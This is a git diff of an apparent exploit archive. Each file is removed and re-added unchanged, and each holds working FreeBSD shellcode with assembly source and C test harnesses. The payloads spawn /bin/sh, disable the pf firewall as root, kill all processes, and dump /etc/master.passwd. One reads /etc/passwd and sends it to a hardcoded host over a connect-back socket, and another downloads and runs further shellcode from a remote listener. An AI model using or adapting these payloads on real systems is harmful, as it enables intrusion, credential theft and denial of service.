exec("/bin/sh") Shellcode - 31 bytes - * - * - * - * Authors: - * Maycon M. Vitali ( 0ut0fBound ) - * Milw0rm .: http://www.milw0rm.com/author/869 - * Page ....: http://maycon.hacknroll.com - * Email ...: maycon@hacknroll.com - * - * Anderson Eduardo ( c0d3_z3r0 ) - * Milw0rm .: http://www.milw0rm.com/author/1570 - * Page ....: http://anderson.hacknroll.com - * Email ...: anderson@hacknroll.com - * - * ------------------------------------------------------- - * - * amd64# gcc hacknroll.c -o hacknroll - * amd64# ./hacknroll - * # exit - * amd64# - * - * ------------------------------------------------------- - */ - -const char shellcode[] = - "\x48\x31\xc0" // xor %rax,%rax - "\x99" // cltd - "\xb0\x3b" // mov $0x3b,%al - "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622fff,%rdi - "\x48\xc1\xef\x08" // shr $0x8,%rdi - "\x57" // push %rdi - "\x48\x89\xe7" // mov %rsp,%rdi - "\x57" // push %rdi - "\x52" // push %rdx - "\x48\x89\xe6" // mov %rsp,%rsi - "\x0f\x05"; // syscall - -int main(void) -{ - (*(void (*)()) shellcode)(); - return 0; -} - - +/** + * + * _ _ _ ____ _ _ + * | | | | __ _ ___| | ___ __ | _ \ ___ | | | + * | |_| |/ _` |/ __| |/ / '_ \ | |_) / _ \| | | + * | _ | (_| | (__| <| | | | | _ < (_) | | | + * |_| |_|\__,_|\___|_|\_\_| |_| |_| \_\___/|_|_| + * [ http://www.hacknroll.com ] + * + * Description: + * FreeBSD x86-64 exec("/bin/sh") Shellcode - 31 bytes + * + * + * + * Authors: + * Maycon M. Vitali ( 0ut0fBound ) + * Milw0rm .: http://www.milw0rm.com/author/869 + * Page ....: http://maycon.hacknroll.com + * Email ...: maycon@hacknroll.com + * + * Anderson Eduardo ( c0d3_z3r0 ) + * Milw0rm .: http://www.milw0rm.com/author/1570 + * Page ....: http://anderson.hacknroll.com + * Email ...: anderson@hacknroll.com + * + * ------------------------------------------------------- + * + * amd64# gcc hacknroll.c -o hacknroll + * amd64# ./hacknroll + * # exit + * amd64# + * + * ------------------------------------------------------- + */ + +const char shellcode[] = + "\x48\x31\xc0" // xor %rax,%rax + "\x99" // cltd + "\xb0\x3b" // mov $0x3b,%al + "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622fff,%rdi + "\x48\xc1\xef\x08" // shr $0x8,%rdi + "\x57" // push %rdi + "\x48\x89\xe7" // mov %rsp,%rdi + "\x57" // push %rdi + "\x52" // push %rdx + "\x48\x89\xe6" // mov %rsp,%rsi + "\x0f\x05"; // syscall + +int main(void) +{ + (*(void (*)()) shellcode)(); + return 0; +} + + // milw0rm.com [2009-05-18] \ No newline at end of file diff --git a/platforms/freebsd_x86-64/shellcode/13280.c b/platforms/freebsd_x86-64/shellcode/13280.c index 2fe81a26a..60bf68b67 100755 --- a/platforms/freebsd_x86-64/shellcode/13280.c +++ b/platforms/freebsd_x86-64/shellcode/13280.c @@ -1,63 +1,63 @@ - /* -Anderson Eduardo < c0d3_z3r0 > -Hack'n Roll -http://anderson.hacknroll.com -http://blog.hacknroll.com - -.section .text -.globl _start -_start: - - - xor %rcx,%rcx - jmp string - - main: - - popq %rsi - movq %rsi,%rdi - - pushq %rsi - pushq %rcx - movq %rsp,%rsi - - movq %rcx,%rdx - movb $0x3b,%al - syscall - - string: - callq main - .string "/bin/sh" - - -*/ - -int main(void) -{ -char shellcode[] = -"\x48\x31\xc9" -"\xeb\x10" -"\x5e" -"\x48\x89\xf7" -"\x56" -"\x51" -"\x48\x89\xe6" -"\x48\x89\xca" -"\xb0\x3b" -"\x0f\x05" -"\x48\xe8\xea\xff\xff\xff" -"\x2f" -"\x62" -"\x69" -"\x6e" -"\x2f" -"\x73\x68"; - - (*(void (*)()) shellcode)(); - -//Hack'n Roll - -return 0; -} - + /* +Anderson Eduardo < c0d3_z3r0 > +Hack'n Roll +http://anderson.hacknroll.com +http://blog.hacknroll.com + +.section .text +.globl _start +_start: + + + xor %rcx,%rcx + jmp string + + main: + + popq %rsi + movq %rsi,%rdi + + pushq %rsi + pushq %rcx + movq %rsp,%rsi + + movq %rcx,%rdx + movb $0x3b,%al + syscall + + string: + callq main + .string "/bin/sh" + + +*/ + +int main(void) +{ +char shellcode[] = +"\x48\x31\xc9" +"\xeb\x10" +"\x5e" +"\x48\x89\xf7" +"\x56" +"\x51" +"\x48\x89\xe6" +"\x48\x89\xca" +"\xb0\x3b" +"\x0f\x05" +"\x48\xe8\xea\xff\xff\xff" +"\x2f" +"\x62" +"\x69" +"\x6e" +"\x2f" +"\x73\x68"; + + (*(void (*)()) shellcode)(); + +//Hack'n Roll + +return 0; +} + // milw0rm.com [2009-05-15] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13261.txt b/platforms/freebsd_x86/shellcode/13261.txt index 70191f797..567f34cc5 100755 --- a/platforms/freebsd_x86/shellcode/13261.txt +++ b/platforms/freebsd_x86/shellcode/13261.txt @@ -1,43 +1,43 @@ -/* - -ELF - FreeBSD Execve /bin/sh - Anti-Debugging - i386/AMD64 - -c0d3_z3r0 < anderson_underground@hotmail.com ; andersonc0d3@gmail.com > - -http://anderson.hacknroll.com -http://blog.hacknroll.com - -\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00 -\x02\x00\x03\x00\x01\x00\x00\x00\x74\x80\x04\x08\x34\x00\x00\x00 -\xa8\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00 -\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08 -\x00\x80\x04\x08\x8b\x00\x00\x00\x8b\x00\x00\x00\x05\x00\x00\x00 -\x00\x10\x00\x00\x01\x00\x00\x00\x8c\x00\x00\x00\x8c\x90\x04\x08 -\x8c\x90\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00 -\x00\x10\x00\x00\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69 -\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x44 - -c0d3labs# uname -p -i386 -c0d3labs# perl -e 'print "\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x74\x80\x04\x08\x34\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\x8b\x00\x00\x00\x8b\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x8c\x00\x00\x00\x8c\x90\x04\x08\x8c\x90\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x44"' > binary -c0d3labs# ./binary -# exit -c0d3labs# objdump -d binary -objdump: binary: File truncated -c0d3labs# gdb -q binary -"/usr/home/andersonc0d3/elf/binary": not in executable format: File truncated -(gdb) q -c0d3labs# file binary -binary: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped -c0d3labs# - -c0d3labs64# uname -p -amd64 -c0d3labs64# perl -e 'print "\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x74\x80\x04\x08\x34\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\x8b\x00\x00\x00\x8b\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x8c\x00\x00\x00\x8c\x90\x04\x08\x8c\x90\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x44"' > binary64 -c0d3labs64# ./binary64 -# exit -c0d3labs64# - -*/ - +/* + +ELF - FreeBSD Execve /bin/sh - Anti-Debugging - i386/AMD64 + +c0d3_z3r0 < anderson_underground@hotmail.com ; andersonc0d3@gmail.com > + +http://anderson.hacknroll.com +http://blog.hacknroll.com + +\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00 +\x02\x00\x03\x00\x01\x00\x00\x00\x74\x80\x04\x08\x34\x00\x00\x00 +\xa8\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00 +\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08 +\x00\x80\x04\x08\x8b\x00\x00\x00\x8b\x00\x00\x00\x05\x00\x00\x00 +\x00\x10\x00\x00\x01\x00\x00\x00\x8c\x00\x00\x00\x8c\x90\x04\x08 +\x8c\x90\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00 +\x00\x10\x00\x00\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69 +\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x44 + +c0d3labs# uname -p +i386 +c0d3labs# perl -e 'print "\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x74\x80\x04\x08\x34\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\x8b\x00\x00\x00\x8b\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x8c\x00\x00\x00\x8c\x90\x04\x08\x8c\x90\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x44"' > binary +c0d3labs# ./binary +# exit +c0d3labs# objdump -d binary +objdump: binary: File truncated +c0d3labs# gdb -q binary +"/usr/home/andersonc0d3/elf/binary": not in executable format: File truncated +(gdb) q +c0d3labs# file binary +binary: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped +c0d3labs# + +c0d3labs64# uname -p +amd64 +c0d3labs64# perl -e 'print "\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x74\x80\x04\x08\x34\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\x8b\x00\x00\x00\x8b\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x8c\x00\x00\x00\x8c\x90\x04\x08\x8c\x90\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x44"' > binary64 +c0d3labs64# ./binary64 +# exit +c0d3labs64# + +*/ + # milw0rm.com [2009-04-13] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13262.txt b/platforms/freebsd_x86/shellcode/13262.txt index aeca64be6..3063076e2 100755 --- a/platforms/freebsd_x86/shellcode/13262.txt +++ b/platforms/freebsd_x86/shellcode/13262.txt @@ -1,71 +1,71 @@ - ***(C)oDed bY suN8Hclf*** - DaRk-CodeRs Group production, kid - [FreeBSD x86 setreuid(0, 0) + execve(pfctl -d) 56 bytes] - -The simples way to disable the FreeBSD's packet filter. We do not -flush all rules (pfctl -F all) but only turn the firewall off. - -Assembly code: --------------------------code.asm-------------------------- -section .text -global _start - -_start: - - xor eax, eax - push eax - push eax - mov al, 126 - push eax - int 0x80 ; setreuid() - - xor eax, eax - push eax - push word 0x642d - mov ecx, esp ; ecx contains a pointer to "-d" string - - push eax - push 0x6c746366 - push 0x702f6e69 - push 0x62732f2f - mov ebx, esp ; ebx contains a pointer to "//sbin/pfctl" string - - push eax - push ecx - push ebx - mov ecx, esp - - push eax - push ecx - push ebx - mov al, 0x3b - push eax - int 0x80 ; execve() - - xor eax, eax - push eax - push eax - int 0x80 ; exit() --------------------------code.asm-------------------------- -And C code: --------------------------code.c---------------------------- -#include - -char shellcode[]= -"\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x31\xc0\x50\x66\x68\x2d\x64" -"\x89\xe1\x50\x68\x66\x63\x74\x6c\x68\x69\x6e\x2f\x70\x68\x2f\x2f" -"\x73\x62\x89\xe3\x50\x51\x53\x89\xe1\x50\x51\x53\xb0\x3b\x50\xcd" -"\x80\x31\xc0\x50\x50\xcd\x80"; - -int main(int argc, char *argv[]){ - int (*func)(); - func=(int (*)())shellcode; - (int)(*func)(); -} --------------------------code.c---------------------------- - -Greetz to: 0in, cOndemned (and to other DaRk-CodeRs members), str0ke, e.wiZz!, - Katharsis, doctor and many others... -Visit us : www.dark-coders.pl - + ***(C)oDed bY suN8Hclf*** + DaRk-CodeRs Group production, kid + [FreeBSD x86 setreuid(0, 0) + execve(pfctl -d) 56 bytes] + +The simples way to disable the FreeBSD's packet filter. We do not +flush all rules (pfctl -F all) but only turn the firewall off. + +Assembly code: +-------------------------code.asm-------------------------- +section .text +global _start + +_start: + + xor eax, eax + push eax + push eax + mov al, 126 + push eax + int 0x80 ; setreuid() + + xor eax, eax + push eax + push word 0x642d + mov ecx, esp ; ecx contains a pointer to "-d" string + + push eax + push 0x6c746366 + push 0x702f6e69 + push 0x62732f2f + mov ebx, esp ; ebx contains a pointer to "//sbin/pfctl" string + + push eax + push ecx + push ebx + mov ecx, esp + + push eax + push ecx + push ebx + mov al, 0x3b + push eax + int 0x80 ; execve() + + xor eax, eax + push eax + push eax + int 0x80 ; exit() +-------------------------code.asm-------------------------- +And C code: +-------------------------code.c---------------------------- +#include + +char shellcode[]= +"\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x31\xc0\x50\x66\x68\x2d\x64" +"\x89\xe1\x50\x68\x66\x63\x74\x6c\x68\x69\x6e\x2f\x70\x68\x2f\x2f" +"\x73\x62\x89\xe3\x50\x51\x53\x89\xe1\x50\x51\x53\xb0\x3b\x50\xcd" +"\x80\x31\xc0\x50\x50\xcd\x80"; + +int main(int argc, char *argv[]){ + int (*func)(); + func=(int (*)())shellcode; + (int)(*func)(); +} +-------------------------code.c---------------------------- + +Greetz to: 0in, cOndemned (and to other DaRk-CodeRs members), str0ke, e.wiZz!, + Katharsis, doctor and many others... +Visit us : www.dark-coders.pl + # milw0rm.com [2008-09-12] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13263.txt b/platforms/freebsd_x86/shellcode/13263.txt index 68925ccb3..5c94c255e 100755 --- a/platforms/freebsd_x86/shellcode/13263.txt +++ b/platforms/freebsd_x86/shellcode/13263.txt @@ -1,133 +1,133 @@ - ***(C)oDed bY suN8Hclf*** - DaRk-CodeRs Group production, kid - [FreeBSD x86 connect back.send.exit /etc/passwd 112 bytes] - -This is the FreeBSD version of 0in's shellcode (http://milw0rm.com/shellcode/6263) -(really learnt a lot while coding this one ;]) - -Compile: -nasm -f elf shellcode.asm -ld -e _start -o shellcode shellcode.o -================================================================================ -How it works: -1st terminal: $nc -l 8000 -2nd terminal: $./shellcode -2nd terminal: -# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ -# -root:*:0:0:Charlie &:/root:/bin/csh -toor:*:0:0:Bourne-again Superuser:/root: -daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin -operator:*:2:5:System &:/:/usr/sbin/nologin -bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin -tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin -kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin -games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin -news:*:8:8:News Subsystem:/:/usr/sbin/nologin -man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin -sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin -smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin -mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin -bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin -[..] -================================================================================ -Code: --------------------------code.asm--------------------- -section .text -global _start - -_start: -xor eax, eax -push byte 0x64 -push word 0x7773 -push 0x7361702f -push 0x6374652f ;file to open (default:/etc/passwd) -mov ebx, esp -push eax -push ebx -mov al, 5 ;use: 'cat /usr/src/sys/kern/syscalls.master | grep *' to get the right numbers -push eax -int 0x80 ;open() - -mov ebx, eax ;file descriptor to ebx -xor eax, eax ;we should clean eax each time we return from int 0x80 -xor ecx, ecx - -mov cx, 3333 ;3333 bytes is probably enough -push ecx -mov esi, esp ;put our data on the stack -push esi -push ebx -mov al, 3 -push eax -int 0x80 ;read() - -mov ebp, eax -xor eax, eax -mov al, 6 -push ebx -push eax -int 0x80 ;close() - -xor eax, eax -push eax -push byte 0x01 -push byte 0x02 -mov al, 97 -push eax -int 0x80 ;socket() - -mov edx, eax ;socket descriptor to edx - -push 0x2101a8c0 ;192.168.1.33, change IT!!! -push 0x401f02AA ;port 8000 -mov eax, esp - -push byte 0x10 -push eax -push edx -xor eax, eax -mov al, 98 -push eax -int 0x80 ;connect() - -xor eax, eax -push ebp -push esi ;our buffer with data -push edx -mov al, 4 -push eax -int 0x80 ;write() - -xor eax, eax -inc eax -push eax -push eax -int 0x80 ;exit() --------------------------code.asm--------------------- - -C Code: --------------------------code.c----------------------- -#include - -char shellcode[]= -"\x31\xc0\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63" -"\x89\xe3\x50\x53\xb0\x05\x50\xcd\x80\x89\xc3\x31\xc0\x31\xc9\x66\xb9\x05" -"\x0d\x51\x89\xe6\x56\x53\xb0\x03\x50\xcd\x80\x89\xc5\x31\xc0\xb0\x06\x53" -"\x50\xcd\x80\x31\xc0\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2" -"\x68\xc0\xa8\x01\x21" //<- host address -"\x68\xaa\x02\x1f\x40" // <- port number -"\x89\xe0\x6a\x10\x50\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc0\x55\x56\x52" -"\xb0\x04\x50\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80"; - -int main(int argc, char **argv) { - int (*func)(); - func=(int (*)())shellcode; - (int)(*func)(); -} --------------------------code.c----------------------- - -Greetz to: 0in, cOndemned, e.wiZz!, str0ke, doctor -Visit us : www.dark-coders.pl - + ***(C)oDed bY suN8Hclf*** + DaRk-CodeRs Group production, kid + [FreeBSD x86 connect back.send.exit /etc/passwd 112 bytes] + +This is the FreeBSD version of 0in's shellcode (http://milw0rm.com/shellcode/6263) +(really learnt a lot while coding this one ;]) + +Compile: +nasm -f elf shellcode.asm +ld -e _start -o shellcode shellcode.o +================================================================================ +How it works: +1st terminal: $nc -l 8000 +2nd terminal: $./shellcode +2nd terminal: +# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ +# +root:*:0:0:Charlie &:/root:/bin/csh +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +[..] +================================================================================ +Code: +-------------------------code.asm--------------------- +section .text +global _start + +_start: +xor eax, eax +push byte 0x64 +push word 0x7773 +push 0x7361702f +push 0x6374652f ;file to open (default:/etc/passwd) +mov ebx, esp +push eax +push ebx +mov al, 5 ;use: 'cat /usr/src/sys/kern/syscalls.master | grep *' to get the right numbers +push eax +int 0x80 ;open() + +mov ebx, eax ;file descriptor to ebx +xor eax, eax ;we should clean eax each time we return from int 0x80 +xor ecx, ecx + +mov cx, 3333 ;3333 bytes is probably enough +push ecx +mov esi, esp ;put our data on the stack +push esi +push ebx +mov al, 3 +push eax +int 0x80 ;read() + +mov ebp, eax +xor eax, eax +mov al, 6 +push ebx +push eax +int 0x80 ;close() + +xor eax, eax +push eax +push byte 0x01 +push byte 0x02 +mov al, 97 +push eax +int 0x80 ;socket() + +mov edx, eax ;socket descriptor to edx + +push 0x2101a8c0 ;192.168.1.33, change IT!!! +push 0x401f02AA ;port 8000 +mov eax, esp + +push byte 0x10 +push eax +push edx +xor eax, eax +mov al, 98 +push eax +int 0x80 ;connect() + +xor eax, eax +push ebp +push esi ;our buffer with data +push edx +mov al, 4 +push eax +int 0x80 ;write() + +xor eax, eax +inc eax +push eax +push eax +int 0x80 ;exit() +-------------------------code.asm--------------------- + +C Code: +-------------------------code.c----------------------- +#include + +char shellcode[]= +"\x31\xc0\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63" +"\x89\xe3\x50\x53\xb0\x05\x50\xcd\x80\x89\xc3\x31\xc0\x31\xc9\x66\xb9\x05" +"\x0d\x51\x89\xe6\x56\x53\xb0\x03\x50\xcd\x80\x89\xc5\x31\xc0\xb0\x06\x53" +"\x50\xcd\x80\x31\xc0\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2" +"\x68\xc0\xa8\x01\x21" //<- host address +"\x68\xaa\x02\x1f\x40" // <- port number +"\x89\xe0\x6a\x10\x50\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc0\x55\x56\x52" +"\xb0\x04\x50\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80"; + +int main(int argc, char **argv) { + int (*func)(); + func=(int (*)())shellcode; + (int)(*func)(); +} +-------------------------code.c----------------------- + +Greetz to: 0in, cOndemned, e.wiZz!, str0ke, doctor +Visit us : www.dark-coders.pl + # milw0rm.com [2008-09-10] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13264.txt b/platforms/freebsd_x86/shellcode/13264.txt index c784ed442..293381703 100755 --- a/platforms/freebsd_x86/shellcode/13264.txt +++ b/platforms/freebsd_x86/shellcode/13264.txt @@ -1,45 +1,45 @@ - ***(C)oDed bY suN8Hclf*** - DaRk-CodeRs Group productions, kid - [FreeBSD x86 kill all procesess 12 bytes shellcode] - - -Compile: -nasm -f elf code.asm -ld -e _start -o code code.o - -Assembly code: ----------------------code.asm------------------- -section .text -global _start - -_start: -xor eax, eax -push byte 9 ; SIGKILL -dec eax -push eax ; -1 (0xffffffff) -inc eax -mov al, 37 ;kill() syscall number, check /usr/src/sys/kern/syscalls.master for details -push eax -int 0x80 ----------------------code.asm------------------- - -And C code: ----------------------code.c--------------------- -#include - -char shellcode[]= -"\x31\xc0\x6a\x09\x48\x50\x40\xb0\x25\x50\xcd\x80"; - -int main() -{ -int (*func)(); -func=(int (*)())shellcode; -(int)(*func)(); -} ----------------------code.c--------------------- - - -Greetz: all DaRk-CodeRs guys, e.wiZz!, doctor -Visit : www.dark-coders.pl - + ***(C)oDed bY suN8Hclf*** + DaRk-CodeRs Group productions, kid + [FreeBSD x86 kill all procesess 12 bytes shellcode] + + +Compile: +nasm -f elf code.asm +ld -e _start -o code code.o + +Assembly code: +---------------------code.asm------------------- +section .text +global _start + +_start: +xor eax, eax +push byte 9 ; SIGKILL +dec eax +push eax ; -1 (0xffffffff) +inc eax +mov al, 37 ;kill() syscall number, check /usr/src/sys/kern/syscalls.master for details +push eax +int 0x80 +---------------------code.asm------------------- + +And C code: +---------------------code.c--------------------- +#include + +char shellcode[]= +"\x31\xc0\x6a\x09\x48\x50\x40\xb0\x25\x50\xcd\x80"; + +int main() +{ +int (*func)(); +func=(int (*)())shellcode; +(int)(*func)(); +} +---------------------code.c--------------------- + + +Greetz: all DaRk-CodeRs guys, e.wiZz!, doctor +Visit : www.dark-coders.pl + # milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13265.c b/platforms/freebsd_x86/shellcode/13265.c index 892f5864b..b40c85e30 100755 --- a/platforms/freebsd_x86/shellcode/13265.c +++ b/platforms/freebsd_x86/shellcode/13265.c @@ -1,102 +1,102 @@ -/* -; sm4x - 2008 -; reverse connect dl(shellcode) and execute, exit -; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ;) -; - feed it with a $nc -vvl -p8000 pls exit from jmp shellcode) -xor eax, eax -inc eax -push eax -push eax -int 0x80 - -*/ - -#include -#include -#include - -char code[] = "\x31\xc0\x50\x50\xb0\x17\x50\xcd\x80\x50" - "\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89" - "\xc2\x68\xac\x11\x00\x09\x68\xaa\x02\x1f" - "\x40\x89\xe0\x6a\x10\x50\x52\x31\xc0\xb0" - "\x62\x50\xcd\x80\x75\x24\xb1\x03\x31\xdb" - "\x53\x52\xb0\x5a\x50\xcd\x80\x43\xe2\xf6" - "\x31\xc0\x66\x68\x04\x04\x8d\x8c\x24\xfc" - "\xfb\xff\xff\x51\x52\xb0\x03\x50\xcd\x80" - "\xff\xe1\x31\xc0\x40\x50\x50\xcd\x80"; - -int main(int argc, char **argv) { - int (*func)(); - printf("Bytes: %d\n", sizeof(code)); - func = (int (*)()) code; - (int)(*func)(); -} - +/* +; sm4x - 2008 +; reverse connect dl(shellcode) and execute, exit +; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ;) +; - feed it with a $nc -vvl -p8000 pls exit from jmp shellcode) +xor eax, eax +inc eax +push eax +push eax +int 0x80 + +*/ + +#include +#include +#include + +char code[] = "\x31\xc0\x50\x50\xb0\x17\x50\xcd\x80\x50" + "\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89" + "\xc2\x68\xac\x11\x00\x09\x68\xaa\x02\x1f" + "\x40\x89\xe0\x6a\x10\x50\x52\x31\xc0\xb0" + "\x62\x50\xcd\x80\x75\x24\xb1\x03\x31\xdb" + "\x53\x52\xb0\x5a\x50\xcd\x80\x43\xe2\xf6" + "\x31\xc0\x66\x68\x04\x04\x8d\x8c\x24\xfc" + "\xfb\xff\xff\x51\x52\xb0\x03\x50\xcd\x80" + "\xff\xe1\x31\xc0\x40\x50\x50\xcd\x80"; + +int main(int argc, char **argv) { + int (*func)(); + printf("Bytes: %d\n", sizeof(code)); + func = (int (*)()) code; + (int)(*func)(); +} + // milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13266.asm b/platforms/freebsd_x86/shellcode/13266.asm index b1153df3c..7c20081ec 100755 --- a/platforms/freebsd_x86/shellcode/13266.asm +++ b/platforms/freebsd_x86/shellcode/13266.asm @@ -1,70 +1,70 @@ -; sm4x 2008 -; /bin/cat /etc/master.passwd -; 65 bytes -; FreeBSD 7.0-RELEASE - -global _start -_start: - -xor eax, eax - -; --- setuid(0) -push eax -push eax -mov al, 0x17 -int 0x80 - -; --- setup /etc/master.passwd -jmp short load_file -ok: -pop esi - -; setup /bin/cat -push eax -push 0x7461632f -push 0x6e69622f -mov ebx, esp - -; --- array setup -push eax ; null -push esi ; /etc/master.passwd -push ebx ; /bin/cat -mov edx, esp - -; -- execve() -push eax ; 0 -push edx ; array { "/bin/cat", "/etc/master.passwd", 0} -push ebx ; /bin/cat -mov al, 0x3b -push eax -int 0x80 - -; --- exit -push eax -push eax -int 0x80 - -load_file: -call ok -db '/etc/master.passwd' - -/* - -char code[] = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f" - "\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62" - "\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50" - "\x52\x53\xb0\x3b\x50\xcd\x80\x50\x50\xcd" - "\x80\xe8\xdc\xff\xff\xff\x2f\x65\x74\x63" - "\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61" - "\x73\x73\x77\x64"; - -int main(int argc, char **argv) { - int (*func)(); - printf("Bytes: %d\n", sizeof(code)); - func = (int (*)()) code; - (int)(*func)(); -} - -*/ - +; sm4x 2008 +; /bin/cat /etc/master.passwd +; 65 bytes +; FreeBSD 7.0-RELEASE + +global _start +_start: + +xor eax, eax + +; --- setuid(0) +push eax +push eax +mov al, 0x17 